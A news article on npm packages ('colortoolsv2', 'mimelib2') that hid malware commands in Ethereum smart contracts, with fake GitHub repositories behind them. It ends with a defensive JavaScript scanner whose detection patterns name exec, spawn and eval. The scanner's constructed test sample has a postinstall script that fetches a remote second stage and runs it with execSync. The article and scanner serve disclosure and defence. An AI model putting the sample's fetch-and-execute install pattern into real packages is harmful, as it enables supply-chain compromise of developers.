npm Malware Uses Ethereum Blockchain for Stealthy Attacks
In a stunning development, cybersecurity researchers have unveiled a new malware distribution technique targeting the npm ecosystem. Two malicious packages, uploaded to npm in July, have been found to use the Ethereum blockchain. These packages leverage Ethereum smart contracts to conceal malicious commands, allowing the attackers to install downloader malware on compromised systems.
Ethereum Used for Malware Distribution
A sophisticated supply chain attack involved fake GitHub repositories and npm packages that used Ethereum smart contracts to distribute malware, potentially targeting individuals and organizations in the crypto space. According to researchers at ReversingLabs,
"These latest attacks by threat actors, including the creation of sophisticated attacks using Ethereum blockchain and GitHub, show that attacks on repositories are evolving and that developers and development organizations alike need to be on the lookout for efforts to implant malicious code in legitimate applications, gain access to sensitive development assets and steal sensitive data and digital assets."
The security firm identified the two rogue npm packages as “colortoolsv2” and “mimelib2.” Both contain the files needed to carry out the malicious activity. The move highlights the continuous efforts of malicious actors to find new ways to spread malware undetected. Addressing the matter, ReversingLabs researcher Lucija Valentić noted,
"The two npm packages abused smart contracts to conceal illegal commands that installed downloader malware on compromised systems."
Sophisticated Attack
According to the software supply chain security firm, the malicious libraries are part of a broader, sophisticated campaign targeting both npm and GitHub, designed to deceive developers into downloading and executing them.
Notably, while the packages openly exhibit malicious functionality, the GitHub projects that import them are crafted to appear legitimate. They boasted multiple supposed contributors, thousands of code commits, and numerous stars, all artificially inflated using sockpuppet accounts created around the same time the fake npm packages emerged. Once incorporated into a project, the packages begin their malicious activity by fetching and executing a second-stage payload from a server controlled by the attackers. The analysts said,
“When we dug into the large number of commits and what was committed, it quickly became apparent that the code contributors were also fakes and that the actual number of commits had been inflated. In fact, there are thousands of commits and each day that number increases by a couple of thousand, indicating that the malicious actor has set up an infrastructure for automated commit pushing.”
This incident is part of a larger trend in which attackers increasingly target cryptocurrency app developers, in particular through software supply chain attacks via open-source repositories. ReversingLabs identified 32 such campaigns involving similar malicious code last year.
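The technique described above (a package reads a value from an Ethereum contract, fetches a second stage, and executes it, often from an install hook) can be screened for statically before a dependency is trusted. The following heuristic scanner is an added example written for this article, not code from ReversingLabs or from the packages discussed; the sample package contents and names it checks are constructed for illustration and are not the real colortoolsv2 or mimelib2 files.

```javascript
// Heuristic scan for the pattern described above: Ethereum contract read +
// second-stage fetch + code execution, worse when wired into an install hook.
// Sample package contents are constructed for illustration, not the real
// colortoolsv2 / mimelib2 files.
const INDICATORS = {
  chainRead: [/\bethers\b/, /\bweb3\b/, /eth_call/, /JsonRpcProvider/, /\.getContract\(/],
  fetchStage: [/\bfetch\(/, /https?\.get\(/, /\baxios\b/, /\.request\(/],
  execute: [/child_process/, /\bexec(?:Sync)?\(/, /\bspawn\(/, /\beval\(/, /new Function\(/],
};
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// files: { [path]: contents }. Flags a package only when all three indicator
// groups appear together, which keeps ordinary dapp libraries from tripping it.
function scanPackage(files) {
  const reasons = [];
  let source = '';
  for (const [path, text] of Object.entries(files)) {
    if (path === 'package.json') {
      const scripts = JSON.parse(text).scripts || {};
      for (const hook of LIFECYCLE_HOOKS) {
        if (scripts[hook]) reasons.push(`lifecycle hook "${hook}": ${scripts[hook]}`);
      }
    } else {
      source += '\n' + text;
    }
  }
  let score = 0;
  for (const [group, patterns] of Object.entries(INDICATORS)) {
    const hits = patterns.filter((re) => re.test(source)).map((re) => re.source);
    if (hits.length) { score += 1; reasons.push(`${group}: ${hits.join(', ')}`); }
  }
  const suspicious = score === 3; // chain read, fetch and execute all present
  if (suspicious && reasons.some((r) => r.startsWith('lifecycle hook'))) score += 1;
  return { score, suspicious, reasons };
}

// Constructed samples (hypothetical names): one mimicking the technique, one benign.
const SAMPLE_SUSPICIOUS = {
  'package.json': '{"name":"example-pkg","scripts":{"postinstall":"node index.js"}}',
  'index.js': [
    "const { JsonRpcProvider } = require('ethers');",
    "const { execSync } = require('child_process');",
    '// the stage-two URL is read from a contract instead of being hard-coded',
    'fetch(stageUrl).then((r) => r.text()).then((src) => execSync(src));',
  ].join('\n'),
};
const SAMPLE_BENIGN = {
  'package.json': '{"name":"color-utils","scripts":{"test":"node test.js"}}',
  'index.js': "module.exports = { hex: (r, g, b) => '#' + [r, g, b].map((x) => x.toString(16)).join('') };",
};

console.log(scanPackage(SAMPLE_SUSPICIOUS).reasons);
```

A hit only means the three primitives co-occur and deserves manual review of the package tarball; it does not by itself prove the package is malicious.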